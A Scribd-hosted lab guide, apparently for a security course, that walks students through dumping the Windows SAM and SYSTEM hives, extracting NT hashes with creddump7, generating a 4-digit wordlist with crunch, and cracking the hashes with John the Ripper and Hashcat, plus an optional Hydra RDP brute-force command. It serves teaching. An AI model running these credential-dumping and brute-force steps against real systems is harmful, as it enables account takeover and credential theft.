[go: up one dir, main page]
Scribd
Upload
124 views9 pages

Cracking Passwords

This document provides a step-by-step guide for extracting and cracking Windows passwords using various tools and commands. It details the process of creating a user, exporting registry hives, installing creddump7 on Kali Linux, extracting password hashes, generating a wordlist with crunch, and using John the Ripper for brute force attacks. Additionally, it includes optional steps for using Hydra and Hashcat for further password cracking methods.

Uploaded by

amr hassan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
124 views9 pages

Cracking Passwords

This document provides a step-by-step guide for extracting and cracking Windows passwords using various tools and commands. It details the process of creating a user, exporting registry hives, installing creddump7 on Kali Linux, extracting password hashes, generating a wordlist with crunch, and using John the Ripper for brute force attacks. Additionally, it includes optional steps for using Hydra and Hashcat for further password cracking methods.

Uploaded by

amr hassan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Dr.

Mohammed Tawfik
Kmkhol01@gmail.com

https://orcid.org/0000-0002-1227-387X

Task: Extracting and Cracking Passwords from Windows

Step 1: Creating a User with a Password on Windows

1. Open Command Prompt as Administrator:


o Press Win + X and select Command Prompt (Admin).
o If prompted by User Account Control, click Yes.
2. Create a New User with Password:

Command : net user test 7444 /add

Step 2: Exporting SAM and SYSTEM Registry Hives

1. Run the Following Script in Command Prompt or save it as bat extension

@echo off

echo Exporting SAM and SYSTEM registry hives...

setlocal

set "scriptPath=%~dp0"

:: Ensure the script is running with administrative privileges


net session >nul 2>&1

if %errorLevel% neq 0 (

echo Requesting administrative privileges...

powershell -Command "Start-Process '%~0' -Verb RunAs"

exit /b

echo Saving SAM hive...

reg.exe save HKLM\SAM "%scriptPath%sam_f" || (

echo Failed to save SAM hive.

goto end

echo Saving SYSTEM hive...

reg.exe save HKLM\SYSTEM "%scriptPath%system_f" || (

echo Failed to save SYSTEM hive.

goto end

endlocal

echo Export completed.

pause

:end

This script will export the SAM and SYSTEM registry hives to files named sam_f and system_f in the
same directory as the script.

should check that these two files (sam_f and system_f) have been created successfully.

Note : The Security Account Manager (SAM) folder is located at


C:\Windows\System32\config\SAM. This folder contains hashed passwords
Step 3: Installing creddump7 on Kali Linux

Open Terminal on Kali Linux:

• Press Ctrl + Alt + T or find Terminal in your applications menu.

Run the Following Command:

sudo apt-get install creddump7


This command installs the creddump7 tool, which is used for extracting credentials from
Windows registry hives.

Expected Result:

• The creddump7 tool should be installed without errors. Students can verify this by
running creddump7 --help to see if the tool's help information is displayed.

Step 4: Using creddump7 to Extract Password Hashes

Navigate to the Directory Containing the Exported Hives:

cd /root/Desktop/sam/
additionally steps to avoid mistakes copy files in folder /usr/share/creddump7/ to sam folder
in desktop or use it directly python pwdump.py /root/Desktop/sam/system_f
/root/Desktop/sam/sam_f
Run the Following Command:

python pwdump.py system_f sam_f

This command uses creddump7 to extract the password hashes from the system_f
and sam_f files.

Optional: Save the Results to a File:

python pwdump.py system_f sam_f >result.txt


Expected Result:

• The extracted password hashes will be displayed in the terminal or saved to


result.txt. Students should see a list of username and password hash pairs.

Keep the user hash that u want to crack his password only or use all

Step 5: Creating a Wordlist with crunch

Open Terminal on Kali Linux:

• Press Ctrl + Alt + T or find Terminal in your applications menu.

Run the Following Command:


crunch 4 4 0123456789 -o ~/word.txt -b 10000
or crunch 4 4 0123456789 -o ~/word.txt -b 5000

This command creates a wordlist with all possible 4-digit combinations (0000 to 9999) and saves
it to ~/Desktop/word.txt

Note :A wordlist is essentially a file that contains a list of potential


passwords. It's used by password-cracking tools to attempt to log into an
account by trying every password in the list.

Step 6: Using John the Ripper for Brute Force Attack

• Open Terminal on Kali Linux:

• Press Ctrl + Alt + T or find Terminal in your applications menu.

• Navigate to the Directory Containing the Password Hashes:

cd /root/Desktop/sam/
Run the Following Command:

john --format=NT --wordlist=word.txt results.txt


This command uses John the Ripper to perform a brute force attack using the generated
wordlist to crack the password hashes.

Additional Examples:

1. Using a Different Wordlist:

bash

john --format=NT --wordlist=~/Desktop/another_wordlist.txt sam_f

2. Setting a Maximum Runtime:

bash

john --format=NT --wordlist=~/Desktop/4digit_wordlist_extended.txt --


max-run-time=3600 sam_f

3. Using Custom Rules:

bash

john --format=NT --wordlist=~/Desktop/4digit_wordlist_extended.txt --


rules sam_f

Optional Steps:

• Using Hydra for RDP Attack (Optional):

bash

hydra -l hackme -P ~/Desktop/word.txt -t 4 -V rdp://192.168.1.137


• Using Hashcat for Brute Force Attack (Optional):

bash

hashcat -m 1000 -a 0 results.txt word.txt


To show all results
hashcat -m 1000 --show results.txt

As we can see the passwords

You might also like